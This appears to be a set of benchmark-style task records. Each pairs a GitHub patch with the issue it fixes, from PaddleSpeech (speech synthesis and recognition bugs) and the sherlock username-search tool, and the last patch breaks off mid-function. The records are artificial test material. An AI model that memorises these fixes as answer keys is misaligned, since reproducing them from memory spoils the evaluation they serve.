diff --git a/paddlespeech/server/engine/engine_warmup.py b/paddlespeech/server/engine/engine_warmup.py --- a/paddlespeech/server/engine/engine_warmup.py +++ b/paddlespeech/server/engine/engine_warmup.py @@ -60,7 +60,10 @@ def warm_up(engine_and_type: str, warm_up_time: int=3) -> bool: else: st = time.time() - connection_handler.infer(text=sentence) + connection_handler.infer( + text=sentence, + lang=tts_engine.lang, + am=tts_engine.config.am) et = time.time() logger.debug( f"The response time of the {i} warm up: {et - st} s")
切换英文语音合成报错 get_input_ids() got an unexpected keyword argument 'get_tone_ids' 要切换成英文语音合成时,更改了/paddlespeech/server/conf/application.yaml这个配置文件中的tts_python里面的声学模型和声码器,声学模型用的是fastspeech2_ljspeech,声码器用的pwgan_ljspeech,并且lang改为en,但是报错 get_input_ids() got an unexpected keyword argument 'get_tone_ids'
2022-07-20T01:59:40
PaddlePaddle/PaddleSpeech
2,364
PaddlePaddle__PaddleSpeech-2364
[ "2363" ]
b76bcc482efc6806852f71d8474b5c399bdbb896
diff --git a/setup.py b/setup.py --- a/setup.py +++ b/setup.py @@ -52,7 +52,7 @@ "Pillow>=9.0.0", "praatio==5.0.0", "protobuf>=3.1.0, <=3.20.0", - "pypinyin", + "pypinyin<=0.44.0", "pypinyin-dict", "python-dateutil", "pyworld==0.2.12",
Added pre-install doc for G2P and TN modules and updated the dependency version of pypinyin Added pre-install doc for G2P and TN modules and updated the dependency version of pypinyin
2022-09-08T12:17:28
PaddlePaddle/PaddleSpeech
2,544
PaddlePaddle__PaddleSpeech-2544
[ "2541" ]
bf6451ed692b121d85c74b58cb16456f6183f814
diff --git a/paddlespeech/s2t/modules/attention.py b/paddlespeech/s2t/modules/attention.py --- a/paddlespeech/s2t/modules/attention.py +++ b/paddlespeech/s2t/modules/attention.py @@ -19,7 +19,6 @@ import paddle from paddle import nn -from paddle.nn import functional as F from paddle.nn import initializer as I from paddlespeech.s2t.modules.align import Linear @@ -56,16 +55,6 @@ def __init__(self, n_head: int, n_feat: int, dropout_rate: float): self.linear_out = Linear(n_feat, n_feat) self.dropout = nn.Dropout(p=dropout_rate) - def _build_once(self, *args, **kwargs): - super()._build_once(*args, **kwargs) - # if self.self_att: - # self.linear_kv = Linear(self.n_feat, self.n_feat*2) - if not self.training: - self.weight = paddle.concat( - [self.linear_k.weight, self.linear_v.weight], axis=-1) - self.bias = paddle.concat([self.linear_k.bias, self.linear_v.bias]) - self._built = True - def forward_qkv(self, query: paddle.Tensor, key: paddle.Tensor, @@ -87,13 +76,8 @@ def forward_qkv(self, n_batch = query.shape[0] q = self.linear_q(query).view(n_batch, -1, self.h, self.d_k) - if self.training: - k = self.linear_k(key).view(n_batch, -1, self.h, self.d_k) - v = self.linear_v(value).view(n_batch, -1, self.h, self.d_k) - else: - k, v = F.linear(key, self.weight, self.bias).view( - n_batch, -1, 2 * self.h, self.d_k).split( - 2, axis=2) + k = self.linear_k(key).view(n_batch, -1, self.h, self.d_k) + v = self.linear_v(value).view(n_batch, -1, self.h, self.d_k) q = q.transpose([0, 2, 1, 3]) # (batch, head, time1, d_k) k = k.transpose([0, 2, 1, 3]) # (batch, head, time2, d_k)
[S2T] ASR : 多卡训练aishell数据报错:'RelPositionMultiHeadedAttention' object has no attribute 'weight' **具体报错信息如下:** ![image](https://user-images.githubusercontent.com/27938135/196336381-7bf0fb1e-5d0d-4997-bbd9-0d0a30888a7b.png) ![image](https://user-images.githubusercontent.com/27938135/196336418-203250ed-299d-4650-9ec4-b458e67edfb8.png) **我的paddle版本是这个:** ![image](https://user-images.githubusercontent.com/27938135/196336457-4ee1ebb1-6ed0-4117-80f7-410d0b67ec4b.png) **请问这个报错是什么情况?**
我们在check这个问题。
2022-10-18T09:08:34
PaddlePaddle/PaddleSpeech
2,549
PaddlePaddle__PaddleSpeech-2549
[ "2526" ]
eac545e1dbf7fccb5c80d3cce9ac3d2fd85d5a12
diff --git a/paddlespeech/cli/asr/infer.py b/paddlespeech/cli/asr/infer.py --- a/paddlespeech/cli/asr/infer.py +++ b/paddlespeech/cli/asr/infer.py @@ -52,7 +52,7 @@ def __init__(self): self.parser.add_argument( '--model', type=str, - default='conformer_u2pp_wenetspeech', + default='conformer_u2pp_online_wenetspeech', choices=[ tag[:tag.index('-')] for tag in self.task_resource.pretrained_models.keys() @@ -470,7 +470,7 @@ def execute(self, argv: List[str]) -> bool: @stats_wrapper def __call__(self, audio_file: os.PathLike, - model: str='conformer_u2pp_wenetspeech', + model: str='conformer_u2pp_online_wenetspeech', lang: str='zh', sample_rate: int=16000, config: os.PathLike=None, diff --git a/paddlespeech/resource/model_alias.py b/paddlespeech/resource/model_alias.py --- a/paddlespeech/resource/model_alias.py +++ b/paddlespeech/resource/model_alias.py @@ -25,7 +25,6 @@ "deepspeech2online": ["paddlespeech.s2t.models.ds2:DeepSpeech2Model"], "conformer": ["paddlespeech.s2t.models.u2:U2Model"], "conformer_online": ["paddlespeech.s2t.models.u2:U2Model"], - "conformer_u2pp": ["paddlespeech.s2t.models.u2:U2Model"], "conformer_u2pp_online": ["paddlespeech.s2t.models.u2:U2Model"], "transformer": ["paddlespeech.s2t.models.u2:U2Model"], "wenetspeech": ["paddlespeech.s2t.models.u2:U2Model"], diff --git a/paddlespeech/resource/pretrained_models.py b/paddlespeech/resource/pretrained_models.py --- a/paddlespeech/resource/pretrained_models.py +++ b/paddlespeech/resource/pretrained_models.py @@ -68,32 +68,12 @@ '', }, }, - "conformer_u2pp_wenetspeech-zh-16k": { - '1.1': { - 'url': - 'https://paddlespeech.bj.bcebos.com/s2t/wenetspeech/asr1/asr1_chunk_conformer_u2pp_wenetspeech_ckpt_1.1.3.model.tar.gz', - 'md5': - '662b347e1d2131b7a4dc5398365e2134', - 'cfg_path': - 'model.yaml', - 'ckpt_path': - 'exp/chunk_conformer_u2pp/checkpoints/avg_10', - 'model': - 'exp/chunk_conformer_u2pp/checkpoints/avg_10.pdparams', - 'params': - 'exp/chunk_conformer_u2pp/checkpoints/avg_10.pdparams', - 'lm_url': - '', - 'lm_md5': - '', - }, - }, "conformer_u2pp_online_wenetspeech-zh-16k": { - '1.1': { + '1.3': { 'url': - 'https://paddlespeech.bj.bcebos.com/s2t/wenetspeech/asr1/asr1_chunk_conformer_u2pp_wenetspeech_ckpt_1.1.4.model.tar.gz', + 'https://paddlespeech.bj.bcebos.com/s2t/wenetspeech/asr1/asr1_chunk_conformer_u2pp_wenetspeech_ckpt_1.3.0.model.tar.gz', 'md5': - '3100fc1eac5779486cab859366992d0b', + '62d230c1bf27731192aa9d3b8deca300', 'cfg_path': 'model.yaml', 'ckpt_path':
使用paddlespeech asr 报错 运行 paddlespeech asr --lang zh --input zh.wav时,报错paddlespeech/models/conformer_u2pp_wenetspeech-zh-16k/1.1/asr1_chunk_conformer_u2pp_wenetspeech_ckpt_1.1.3.model.tar/model.yaml 找不到,请问这是什么原因呢?
搜索下 asr1_chunk_conformer_u2pp_wenetspeech_ckpt_1.1.3.model.tar 目录中个是否有这个文件。 建议更新到最新的仓库代码,删除已下载的本地包,重新执行试一试。 本地包默认在 ~/.paddlespeech/models 遇到相同问题,安装pip包就没有问题,使用源码就有问题 > 搜索下 asr1_chunk_conformer_u2pp_wenetspeech_ckpt_1.1.3.model.tar 目录中个是否有这个文件。 确实是没有的,需要下载新的模型嘛 是的,要下载新模型 > 是的,要下载新模型 删了,再使用源代码下载里面还是没有model.yaml [💫 安装 develop 版本的 paddlespeech ](https://github.com/PaddlePaddle/PaddleSpeech/issues/2472)
2022-10-19T05:33:14
PaddlePaddle/PaddleSpeech
2,683
PaddlePaddle__PaddleSpeech-2683
[ "2571" ]
45426846942f68cf43a23677d8d55f6d4ab93ab1
diff --git a/paddlespeech/t2s/frontend/zh_normalization/text_normlization.py b/paddlespeech/t2s/frontend/zh_normalization/text_normlization.py --- a/paddlespeech/t2s/frontend/zh_normalization/text_normlization.py +++ b/paddlespeech/t2s/frontend/zh_normalization/text_normlization.py @@ -65,7 +65,7 @@ def _split(self, text: str, lang="zh") -> List[str]: if lang == "zh": text = text.replace(" ", "") # 过滤掉特殊字符 - text = re.sub(r'[《》【】<=>{}()()#&@“”^_|…\\]', '', text) + text = re.sub(r'[——《》【】<=>{}()()#&@“”^_|…\\]', '', text) text = self.SENTENCE_SPLITOR.sub(r'\1\n', text) text = text.strip() sentences = [sentence.strip() for sentence in re.split(r'\n+', text)] @@ -85,7 +85,33 @@ def _post_replace(self, sentence: str) -> str: sentence = sentence.replace('⑧', '八') sentence = sentence.replace('⑨', '九') sentence = sentence.replace('⑩', '十') - + sentence = sentence.replace('α', '阿尔法') + sentence = sentence.replace('β', '贝塔') + sentence = sentence.replace('γ', '伽玛').replace('Γ', '伽玛') + sentence = sentence.replace('δ', '德尔塔').replace('Δ', '德尔塔') + sentence = sentence.replace('ε', '艾普西龙') + sentence = sentence.replace('ζ', '捷塔') + sentence = sentence.replace('η', '依塔') + sentence = sentence.replace('θ', '西塔').replace('Θ', '西塔') + sentence = sentence.replace('ι', '艾欧塔') + sentence = sentence.replace('κ', '喀帕') + sentence = sentence.replace('λ', '拉姆达').replace('Λ', '拉姆达') + sentence = sentence.replace('μ', '缪') + sentence = sentence.replace('ν', '拗') + sentence = sentence.replace('ξ', '克西').replace('Ξ', '克西') + sentence = sentence.replace('ο', '欧米克伦') + sentence = sentence.replace('π', '派').replace('Π', '派') + sentence = sentence.replace('ρ', '肉') + sentence = sentence.replace('ς', '西格玛').replace('Σ', '西格玛').replace( + 'σ', '西格玛') + sentence = sentence.replace('τ', '套') + sentence = sentence.replace('υ', '宇普西龙') + sentence = sentence.replace('φ', '服艾').replace('Φ', '服艾') + sentence = sentence.replace('χ', '器') + sentence = sentence.replace('ψ', '普赛').replace('Ψ', '普赛') + sentence = sentence.replace('ω', '欧米伽').replace('Ω', '欧米伽') + # re filter special characters, have one more character "-" than line 68 + sentence = re.sub(r'[-——《》【】<=>{}()()#&@“”^_|…\\]', '', sentence) return sentence def normalize_sentence(self, sentence: str) -> str: @@ -124,6 +150,5 @@ def normalize_sentence(self, sentence: str) -> str: def normalize(self, text: str) -> List[str]: sentences = self._split(text) - sentences = [self.normalize_sentence(sent) for sent in sentences] return sentences
[TTS]特殊的句子及标点导致报错 For support and discussions, please use our [Discourse forums](https://github.com/PaddlePaddle/DeepSpeech/discussions). If you've found a bug then please create an issue with the following information: **Describe the bug** 特殊句式导致报错 **To Reproduce** 报错句子:`并且——说来会使他惭愧——是以庄重口气谈到的,` **Expected behavior** 正常生成 **Screenshots** ```shell Loading model cost 0.382 seconds. DEBUG 2022-10-22 17:58:41,857 __init__.py:164] Loading model cost 0.382 seconds. Prefix dict has been built successfully. DEBUG 2022-10-22 17:58:41,857 __init__.py:166] Prefix dict has been built successfully. [并且——说来会使他惭愧——是以庄重口气谈到的,] not in g2pW dict,use g2pM Traceback (most recent call last): File "C:\Users\ming\Desktop\1\2.py", line 28, in <module> tts(text=text, output="output.wav") File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\cli\utils.py", line 328, in _warpper return executor_func(self, *args, **kwargs) File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\cli\tts\infer.py", line 684, in __call__ self.infer(text=text, lang=lang, am=am, spk_id=spk_id) File "C:\Users\ming\envs\b-site\lib\site-packages\decorator.py", line 232, in fun return caller(func, *(extras + args), **kw) File "C:\Users\ming\envs\b-site\lib\site-packages\paddle\fluid\dygraph\base.py", line 354, in _decorate_function return func(*args, **kwargs) File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\cli\tts\infer.py", line 445, in infer frontend_dict = run_frontend( File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\t2s\exps\syn_utils.py", line 195, in run_frontend input_ids = frontend.get_input_ids( File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\t2s\frontend\zh_frontend.py", line 517, in get_input_ids phonemes = self.get_phonemes( File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\t2s\frontend\zh_frontend.py", line 437, in get_phonemes phonemes = self._g2p( File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\t2s\frontend\zh_frontend.py", line 243, in _g2p sub_finals = self.tone_modifier.modified_tone(word, pos, File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\t2s\frontend\tone_sandhi.py", line 352, in modified_tone finals = self._neural_sandhi(word, pos, finals) File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\t2s\frontend\tone_sandhi.py", line 89, in _neural_sandhi finals[-1] = finals[-1][:-1] + "5" IndexError: list index out of range ```
正则化时需要对 `——` 这个特殊符号进行过滤,欢迎提交 pr 修复
2022-11-24T12:02:28
PaddlePaddle/PaddleSpeech
2,825
PaddlePaddle__PaddleSpeech-2825
[ "2819" ]
faa2f866516e1e1afb40b25df907ebe3078bd078
diff --git a/paddlespeech/s2t/models/whisper/tokenizer.py b/paddlespeech/s2t/models/whisper/tokenizer.py --- a/paddlespeech/s2t/models/whisper/tokenizer.py +++ b/paddlespeech/s2t/models/whisper/tokenizer.py @@ -155,6 +155,10 @@ def decode(self, if ids < len(self.tokenizer): ids_list.append(ids) token_ids = ids_list + elif len(token_ids) == 1: + token_ids = token_ids[0] + else: + raise ValueError(f"token_ids {token_ids} load error.") return self.tokenizer.decode(token_ids, **kwargs) diff --git a/paddlespeech/s2t/models/whisper/whipser.py b/paddlespeech/s2t/models/whisper/whipser.py --- a/paddlespeech/s2t/models/whisper/whipser.py +++ b/paddlespeech/s2t/models/whisper/whipser.py @@ -17,12 +17,11 @@ import numpy as np import paddle import paddle.nn.functional as F +import paddlespeech.s2t.modules.align as paddlespeech_nn import soundfile import tqdm from paddle import nn from paddle.distribution import Categorical - -import paddlespeech.s2t.modules.align as paddlespeech_nn from paddlespeech.s2t.models.whisper import utils from paddlespeech.s2t.models.whisper.tokenizer import get_tokenizer from paddlespeech.s2t.models.whisper.tokenizer import LANGUAGES @@ -771,8 +770,10 @@ def update(self, if temperature == 0: next_tokens = paddle.argmax(logits, axis=-1) else: - next_tokens = Categorical(logits=logits / temperature).sample( - shape=logits.shape) + next_tokens = Categorical(logits=logits / temperature).sample([1]) + next_tokens = paddle.reshape(next_tokens, [ + next_tokens.shape[0] * next_tokens.shape[1], + ]) logprobs = F.log_softmax(logits, axis=-1, dtype=paddle.float32) current_logprobs = logprobs[paddle.arange(logprobs.shape[0]), @@ -1205,9 +1206,8 @@ def run(self, mel: paddle.Tensor) -> List[DecodingResult]: DecodingResult( audio_features=features, language=language, - language_probs=probs) - for features, language, probs in zip(audio_features, languages, - language_probs) + language_probs=probs) for features, language, probs in + zip(audio_features, languages, language_probs) ] # repeat the audio & text tensors by the group size, for beam search or best-of-n sampling
[S2T] Whisper ASR Model excution got TypeError **Describe the bug** A clear and concise description of what the bug is. ```python-traceback Traceback (most recent call last)/tmp/ipykernel_98/3684188953.py in <module> 10 audio_file=audio_file, 11 language='ja', ---> 12 device=paddle.get_device()) ~/external-libraries/paddlespeech/cli/utils.py in _warpper(self, *args, **kwargs) 326 except Exception: 327 pass --> 328 return executor_func(self, *args, **kwargs) 329 330 return _warpper ~/external-libraries/paddlespeech/cli/whisper/infer.py in __call__(self, audio_file, model, lang, task, size, language, sample_rate, config, ckpt_path, decode_method, num_decoding_left_chunks, force_yes, rtf, device) 482 483 self.preprocess(model, audio_file) --> 484 self.infer(model) 485 res = self.postprocess() # Retrieve result of asr. 486 <decorator-gen-695> in infer(self, model_type) /opt/conda/envs/python35-paddle120-env/lib/python3.7/site-packages/paddle/fluid/dygraph/base.py in _decorate_function(func, *args, **kwargs) 373 def _decorate_function(func, *args, **kwargs): 374 with self: --> 375 return func(*args, **kwargs) 376 377 @decorator.decorator ~/external-libraries/paddlespeech/cli/whisper/infer.py in infer(self, model_type) 293 initial_prompt=cfg.initial_prompt, 294 condition_on_previous_text=cfg.condition_on_previous_text, --> 295 no_speech_threshold=cfg.no_speech_threshold) 296 297 def postprocess(self) -> Union[str, os.PathLike]: ~/external-libraries/paddlespeech/s2t/models/whisper/whipser.py in transcribe(model, mel, resource_path, verbose, temperature, compression_ratio_threshold, logprob_threshold, no_speech_threshold, condition_on_previous_text, **decode_options) 623 time_precision, 624 text_tokens=sliced_tokens[1:-1], --> 625 result=result, ) 626 last_slice = current_slice 627 last_timestamp_position = ( ~/external-libraries/paddlespeech/s2t/models/whisper/whipser.py in add_segment(start, end, text_tokens, result) 552 result: DecodingResult): 553 text = tokenizer.decode( --> 554 [token for token in text_tokens if token < tokenizer.eot]) 555 if len(text.strip()) == 0: # skip empty text output 556 return ~/external-libraries/paddlespeech/s2t/models/whisper/tokenizer.py in decode(self, token_ids, **kwargs) 157 token_ids = ids_list 158 --> 159 return self.tokenizer.decode(token_ids, **kwargs) 160 161 def decode_with_timestamps(self, tokens) -> str: /opt/conda/envs/python35-paddle120-env/lib/python3.7/site-packages/paddlenlp/transformers/tokenizer_utils_base.py in decode(self, token_ids, skip_special_tokens, clean_up_tokenization_spaces, **kwargs) 3156 skip_special_tokens=skip_special_tokens, 3157 clean_up_tokenization_spaces=clean_up_tokenization_spaces, -> 3158 **kwargs, 3159 ) 3160 /opt/conda/envs/python35-paddle120-env/lib/python3.7/site-packages/paddlenlp/transformers/tokenizer_utils.py in _decode(self, token_ids, skip_special_tokens, clean_up_tokenization_spaces, spaces_between_special_tokens, **kwargs) 1404 1405 filtered_tokens = self.convert_ids_to_tokens( -> 1406 token_ids, skip_special_tokens=skip_special_tokens) 1407 1408 # To avoid mixing byte-level and unicode for byte-level BPT /opt/conda/envs/python35-paddle120-env/lib/python3.7/site-packages/paddlenlp/transformers/tokenizer_utils.py in convert_ids_to_tokens(self, ids, skip_special_tokens) 837 tokens = [] 838 for index in ids: --> 839 index = int(index) 840 if skip_special_tokens and index in self.all_special_ids: 841 continue TypeError: int() argument must be a string, a bytes-like object or a number, not 'list' ``` **To Reproduce** ```py audio_file = 'audio.wav' whisper_executor = paddlespeech.cli.whisper.WhisperExecutor() result = whisper_executor( model='whisper', task='transcribe', size='medium', sample_rate=16000, config=None, # Set `config` and `ckpt_path` to None to use pretrained model. ckpt_path=None, audio_file=audio_file, language='ja', device=paddle.get_device()) ``` 遇到这个问题时, 被推理的音频都比较长 (比如 100s 音频, 我这手动改了 `self.max_len` 50 秒限制) , 无端猜测可能和音频长度/显存有关。 但真正显存不足的时候 cuda 运行库会直接报告显存不足, 所以又感觉不像。 **Environment (please complete the following information):** - **Baidu AIStudio V100 / A100** - OS: Ubuntu - GCC/G++ Version unkonwn - Python Version 3.7 - PaddlePaddle Version 2.4.0 - Model Version [whisper-large](https://paddlespeech.bj.bcebos.com/whisper/whisper_model_20221122/whisper-large-model.tar.gz) medium, small 也会遇到 - GPU/DRIVER Information Tesla V100-SXM2-32GB/460.32.03, A100 也会遇到 - CUDA/CUDNN Version cuda-10.2/cuDNN Version-8.2 - TensorRT Version **Additional context** Add any other context about the problem here. @zxcd
目前模型不能支持太长的语音数据,不建议手动修改self.max_len参数。如果语音过长建议使用vad工具对语音进行切分。
2023-01-11T13:20:37
PaddlePaddle/PaddleSpeech
2,828
PaddlePaddle__PaddleSpeech-2828
[ "2827" ]
ad40dafa856b9c4539e7b9f82bad2d9ff8c317f4
diff --git a/paddlespeech/s2t/models/whisper/whipser.py b/paddlespeech/s2t/models/whisper/whipser.py --- a/paddlespeech/s2t/models/whisper/whipser.py +++ b/paddlespeech/s2t/models/whisper/whipser.py @@ -476,7 +476,7 @@ def transcribe( decode_options["fp16"] = False if decode_options.get( - "language", 'None') or decode_options.get("language", None) is None: + "language") == 'None' or decode_options.get("language", None) is None: if not model.is_multilingual: decode_options["language"] = "en" else:
[S2T] Whisper transcription cannot choose languages For support and discussions, please use our [Discourse forums](https://github.com/PaddlePaddle/DeepSpeech/discussions). If you've found a bug then please create an issue with the following information: **Describe the bug** Even if users specify a language, program will still detect language by itself. **To Reproduce** ```py import paddle from paddlespeech.cli.whisper import WhisperExecutor audio_file = 'path/to/test.wav' whisper_executor = WhisperExecutor() result = whisper_executor( model='whisper', task='transcribe', size='tiny', sample_rate=16000, config=None, # Set `config` and `ckpt_path` to None to use pretrained model. ckpt_path=None, audio_file=audio_file, language='fr', device=paddle.get_device()) ``` **Screenshots** ![image](https://user-images.githubusercontent.com/8279655/211976128-6bd4d272-4189-4a37-bbf6-08c23c090947.png)
2023-01-12T04:31:00
PaddlePaddle/PaddleSpeech
3,606
PaddlePaddle__PaddleSpeech-3606
[ "3605" ]
1dc67f96e0d083adb291589cecb28c9181914a07
diff --git a/paddlespeech/server/engine/tts/online/onnx/tts_engine.py b/paddlespeech/server/engine/tts/online/onnx/tts_engine.py --- a/paddlespeech/server/engine/tts/online/onnx/tts_engine.py +++ b/paddlespeech/server/engine/tts/online/onnx/tts_engine.py @@ -154,7 +154,7 @@ def _init_from_path( self.voc_sess = get_sess(self.voc_ckpt, voc_sess_conf) logger.debug("Create voc sess successfully.") - with open(self.phones_dict, "r") as f: + with open(self.phones_dict, "r", encoding='utf-8') as f: phn_id = [line.strip().split() for line in f.readlines()] self.vocab_size = len(phn_id) logger.debug(f"vocab_size: {self.vocab_size}")
[TTS]windows下启动报错 For support and discussions, please use our [Discourse forums](https://github.com/PaddlePaddle/DeepSpeech/discussions). If you've found a bug then please create an issue with the following information: **Describe the bug** windows下启动`online-onnx`报错 **To Reproduce** Steps to reproduce the behavior: ``` # -*- coding: utf-8 -*- from paddlespeech.server.bin.paddlespeech_server import ServerExecutor server_executor = ServerExecutor() server_executor( config_file="./application.yaml", log_file="./paddlespeech.log") ``` ``` python main.py -X utf8 ``` **Expected behavior** ``` PS E:\temp_code\server> python main.py -X utf8 E:\environment\python\lib\site-packages\paddleaudio\_extension.py:141: UserWarning: paddleaudio C++ extension is not available. warnings.warn("paddleaudio C++ extension is not available.") [2023-11-22 10:10:19,579] [ INFO] - start to init the engine [2023-11-22 10:10:19,580] [ INFO] - tts : online-onnx engine. [2023-11-22 10:10:23,437] [ ERROR] - Failed to get model related files. [2023-11-22 10:10:23,437] [ ERROR] - Initialize TTS server engine Failed on device: cpu. Traceback (most recent call last): File "E:\environment\python\lib\site-packages\paddlespeech\server\engine\tts\online\onnx\tts_engine.py", line 235, in init self.executor._init_from_path( File "E:\environment\python\lib\site-packages\paddlespeech\server\engine\tts\online\onnx\tts_engine.py", line 158, in _init_from_path phn_id = [line.strip().split() for line in f.readlines()] UnicodeDecodeError: 'gbk' codec can't decode byte 0x8c in position 2088: illegal multibyte sequence During handling of the above exception, another exception occurred: Traceback (most recent call last): File "E:\temp_code\server\main.py", line 6, in <module> server_executor( File "E:\environment\python\lib\site-packages\paddlespeech\server\util.py", line 365, in _warpper return executor_func(self, *args, **kwargs) File "E:\environment\python\lib\site-packages\paddlespeech\server\bin\paddlespeech_server.py", line 116, in __call__ if self.init(config): File "E:\environment\python\lib\site-packages\paddlespeech\server\bin\paddlespeech_server.py", line 89, in init if not init_engine_pool(config): File "E:\environment\python\lib\site-packages\paddlespeech\server\engine\engine_pool.py", line 38, in init_engine_pool if not ENGINE_POOL[engine].init(config=config[engine_and_type]): File "E:\environment\python\lib\site-packages\paddlespeech\server\engine\tts\online\onnx\tts_engine.py", line 254, in init logger(e) TypeError: Logger.__call__() missing 1 required positional argument: 'msg' ``` **Screenshots** **Environment (please complete the following information):** - OS: Windoes - GCC/G++ Version 无 - Python Version 3.10 - PaddlePaddle Version 最新 - Model Version 最新 - GPU/DRIVER Informationo 无 - CUDA/CUDNN Version 无 - MKL Version 无 - TensorRT Version 无 **Additional context**
2023-11-22T02:21:53
sherlock-project/sherlock
49
sherlock-project__sherlock-49
[ "47" ]
f9d59270a31b66b205d4777f72f9adadf8acac0d
diff --git a/sherlock.py b/sherlock.py --- a/sherlock.py +++ b/sherlock.py @@ -90,7 +90,8 @@ def sherlock(username, verbose=False, tor=False, unique_tor=False): } # Load the data - with open("data.json", "r", encoding="utf-8") as raw: + data_file_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "data.json") + with open(data_file_path, "r", encoding="utf-8") as raw: data = json.load(raw) # Allow 1 thread for each external service, so `len(data)` threads total
Fails when invoking script from a different directory ``` $ python sherlock/sherlock.py user123 ."""-. / \ ____ _ _ _ | _..--'-. / ___|| |__ ___ _ __| | ___ ___| |__ >.`__.-""\;"` \___ \| '_ \ / _ \ '__| |/ _ \ / __| |/ / / /( ^\ ___) | | | | __/ | | | (_) | (__| < '-`) =|-. |____/|_| |_|\___|_| |_|\___/ \___|_|\_\ /`--.'--' \ .-. .'`-._ `.\ | J / / `--.| \__/ [*] Removing previous file: user123.txt [*] Checking username user123 on: Traceback (most recent call last): File "sherlock/sherlock.py", line 313, in <module> main() File "sherlock/sherlock.py", line 289, in main results = sherlock(username, verbose=args.verbose, tor=args.tor, unique_tor=args.unique_tor) File "sherlock/sherlock.py", line 93, in sherlock raw = open("data.json", "r", encoding="utf-8") FileNotFoundError: [Errno 2] No such file or directory: 'data.json' ```
2018-12-31T05:53:45
sherlock-project/sherlock
77
sherlock-project__sherlock-77
[ "44" ]
992e22059a129c5d445689e8a598d7dde9c7f70c
diff --git a/sherlock.py b/sherlock.py --- a/sherlock.py +++ b/sherlock.py @@ -21,7 +21,7 @@ from torrequest import TorRequest module_name = "Sherlock: Find Usernames Across Social Networks" -__version__ = "2018.01.04" +__version__ = "0.1.0" amount=0 # TODO: fix tumblr
Version Number System I do not think that the version number system should use the date. There are multiple systems out there, but they are all flavors of major.minor.maintenance. This allows the version number to have some meaning to other people. https://github.com/sdushantha/sherlock/blob/e2c4dbf1ef69db80a9c6ebf591be874686e04301/sherlock.py#L20
I do understand your point, but what I was thinking of was that, since we are updating the code frequently, I don't think everyone is going to have the latest version on their computer. So, if use the year.month.day format, users will get and idea if their version has been out dated or not. If major.minor.maintenance is the standard and has a more meaning to other people, I'm more than happy to change it. 😊 @hoadlck Can you delete your fork of this repo? I want to transfer the ownership of this repo to you. To do that, you first have to delete your fork. @sdushantha Uh... you are the owner of this repo. You cannot abandon your child! :) I am on break now, so I had some free time to contribute. But, on 2019-01-02, the daily grind starts up again, and I am unsure how much time I will have to dedicate to this. @hoadlck I'm not abandoning my child, I'm giving my child off to adoption :) It is too difficult for me to maintain this repo. So I really want to give it away. Wait, this are not the end of the conversation, right? I can still see https://github.com/TheYahya/sherlock/blob/508eb88724dbe20dedf07dc00527ad4f32c93a77/sherlock.py#L24 at the moment, yet the latest commit is already on `2019.01.03`. Maybe just have something that are regularly used like `0.0.1`, etc. I think `semantic versioning` is more reasonable, It would be better to change it to that ☺️
2019-01-03T21:51:53
sherlock-project/sherlock
96
sherlock-project__sherlock-96
[ "95", "95" ]
0d857030939da206f9e6098241ff80d869ae80e8
diff --git a/sherlock.py b/sherlock.py --- a/sherlock.py +++ b/sherlock.py @@ -152,11 +152,11 @@ def sherlock(username, verbose=False, tor=False, unique_tor=False): url = net_info["url"].format(username) results_site["url_user"] = url - # If only the status_code is needed don't download the body - if net_info["errorType"] == 'status_code': - request_method = session.head - else: - request_method = session.get + request_method = session.get + if social_network != "GitHub": + # If only the status_code is needed don't download the body + if net_info["errorType"] == 'status_code': + request_method = session.head # This future starts running the request in a new thread, doesn't block the main thread future = request_method(url=url, headers=headers) @@ -380,4 +380,4 @@ def main(): ) if __name__ == "__main__": - main() + main() \ No newline at end of file
GitHub doesn't work I would like to say it's all in the title. GitHub accounts can't be found. GitHub doesn't work I would like to say it's all in the title. GitHub accounts can't be found.
2019-01-05T17:47:48
sherlock-project/sherlock
109
sherlock-project__sherlock-109
[ "82" ]
7e5bac0cb8374030405e2138ff04f5a9525f2527
diff --git a/sherlock.py b/sherlock.py --- a/sherlock.py +++ b/sherlock.py @@ -13,11 +13,12 @@ import sys import platform import re -from argparse import ArgumentParser, RawDescriptionHelpFormatter -from concurrent.futures import ThreadPoolExecutor +from time import time import requests -from colorama import Back, Fore, Style, init +from argparse import ArgumentParser, RawDescriptionHelpFormatter +from concurrent.futures import ThreadPoolExecutor +from colorama import Fore, Style, init from requests_futures.sessions import FuturesSession from torrequest import TorRequest @@ -28,28 +29,78 @@ # TODO: fix tumblr +class ElapsedFuturesSession(FuturesSession): + """ + Extends FutureSession to add a response time metric to each request. + + This is taken (almost) directly from here: https://github.com/ross/requests-futures#working-in-the-background + """ + + def request(self, method, url, hooks={}, *args, **kwargs): + start = time() + + def timing(r, *args, **kwargs): + elapsed_sec = time() - start + r.elapsed = round(elapsed_sec * 1000) + + try: + if isinstance(hooks['response'], (list, tuple)): + # needs to be first so we don't time other hooks execution + hooks['response'].insert(0, timing) + else: + hooks['response'] = [timing, hooks['response']] + except KeyError: + hooks['response'] = timing + + return super(ElapsedFuturesSession, self).request(method, url, hooks=hooks, *args, **kwargs) + + def open_file(fname): return open(fname, "a") + def write_to_file(url, f): f.write(url + "\n") + def final_score(amount, f): f.write("Total: "+str(amount) + "\n") -def print_error(err, errstr, var, debug=False): + +def print_error(err, errstr, var, verbose=False): print(Style.BRIGHT + Fore.WHITE + "[" + Fore.RED + "-" + Fore.WHITE + "]" + Fore.RED + f" {errstr}" + - Fore.YELLOW + f" {err if debug else var}") + Fore.YELLOW + f" {err if verbose else var}") + + +def format_response_time(response_time, verbose): + return " [{} ms]".format(response_time) if verbose else "" + + +def print_found(social_network, url, response_time, verbose=False): + print((Style.BRIGHT + Fore.WHITE + "[" + + Fore.GREEN + "+" + + Fore.WHITE + "]" + + format_response_time(response_time, verbose) + + Fore.GREEN + " {}:").format(social_network), url) + + +def print_not_found(social_network, response_time, verbose=False): + print((Style.BRIGHT + Fore.WHITE + "[" + + Fore.RED + "-" + + Fore.WHITE + "]" + + format_response_time(response_time, verbose) + + Fore.GREEN + " {}:" + + Fore.YELLOW + " Not Found!").format(social_network)) def 